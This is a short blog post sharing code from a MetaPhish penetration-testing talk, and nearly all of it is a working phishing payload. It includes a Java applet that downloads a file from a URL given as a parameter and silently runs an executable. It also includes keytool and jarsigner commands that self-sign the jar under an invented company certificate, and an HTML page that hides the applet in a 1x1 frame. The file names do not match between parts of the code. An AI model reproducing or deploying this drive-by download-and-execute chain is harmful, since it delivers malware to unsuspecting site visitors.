Friday, June 19, 2009

MetaPhish - Pentest Summit 2009

These guys did a cool presentation at the SANS pentest summit 09.

Val Smith (valsmith@attackresearch.com)
Colin Ames (amesc@attackresearch.com)
David Kerb (dkerb@attackresearch.com)

Here is some of the code from the presentation. Thanks guys!!!

import java.applet.Applet;
import java.io.*;
import java.net.*;
import java.io.IOException;
public class WebDispApp extends Applet {
public WebDispApp() { }
public void init() { downloadURL(); cmd();
} /* end public void init */
public void downloadURL() {
OutputStream out = null;
URLConnection conn = null;
InputStream in = null;
try {
String geturi = getParameter("URI");
URL url = new URL(geturi);
String localfile = getParameter("LOCALFILE");
out = new BufferedOutputStream(
new FileOutputStream(localfile));
conn = url.openConnection();
in = conn.getInputStream();
byte[] buffer = new byte[1024];
int numRead;
long numWritten = 0;
while ((numRead = in.read(buffer)) != -1) {
out.write(buffer, 0, numRead);
numWritten += numRead;
} /* end while */
} /* end try */
catch (Exception exception) {
exception.printStackTrace();
} /* end catch */
finally {
try {
if (in != null) {
in.close();
} /* end if */
if (out != null) {
out.close();
} /* end if */
} /* end try */
catch (IOException ioe) { }
} /* end finally */
} /* end public void downloadURL */
public void cmd() {
Process process;
try {
process =
Runtime.getRuntime().exec("cmd.exe /c c:\\met.exe");
} /* end try */
catch(IOException ioexception) { }
} /* end public void cmd */
} /* end public class */


keytool -genkey -alias signFiles -keystore msfkeystore -storepass msfstorepass -dname "cn=Company Name" -keypass msfkeypass

jarsigner -keystore msfkeystore -storepass msfstorepass -keypass msfkeypass -signedjar sWebDispApp.jar WebDispApp.jar signFiles

keytool -export -keystore msfkeystore -storepass msfstorepass -alias signFiles -file MetaPhishLLC.cer

keytool -import -alias company -file MetaPhishLLC.cer -keystore msfkeystore -storepass msfstorepass

<html>
<body>
<APPLET code="MetaPhish.class" archive="sMetaPhish.jar" width="1" height="1">
<PARAM NAME="URI" VALUE="http://127.0.0.1/calc.exe">
<PARAM NAME="LOCALFILE" VALUE="c:\\data.exe">
</APPLET>
</body>
</html>
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)